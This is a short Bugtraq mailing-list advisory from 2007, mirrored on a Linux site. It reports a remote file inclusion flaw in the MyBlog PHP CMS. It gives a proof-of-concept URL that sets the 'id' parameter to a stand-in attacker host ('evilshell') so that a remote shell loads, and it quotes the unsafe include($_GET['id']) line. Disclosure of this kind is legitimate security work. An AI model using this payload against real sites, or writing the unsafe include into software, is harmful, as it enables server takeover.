New User, Welcome!     Login

My Blog Rfi



From: beenudel1986 gmail com
To: bugtraq securityfocus com
Cc:
Subject: My Blog Rfi
Date: Sat - Dec 22, 2007 06:17 AM


MyBlog CMS RFI


Aurthor: Beenu Arora
mail: beenudel1986@gmail.com

Application:MyBlog: PHP and MySQL Blog/CMS software


                       RFI

1.http://localhost/games.php?id=http://evilshell

vulnerablity: include($_GET['id'] . ".php");


greetz : d3, baltazar , Zugzwang , Fuzion , Vivek

Site: www.darkc0de.com




Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!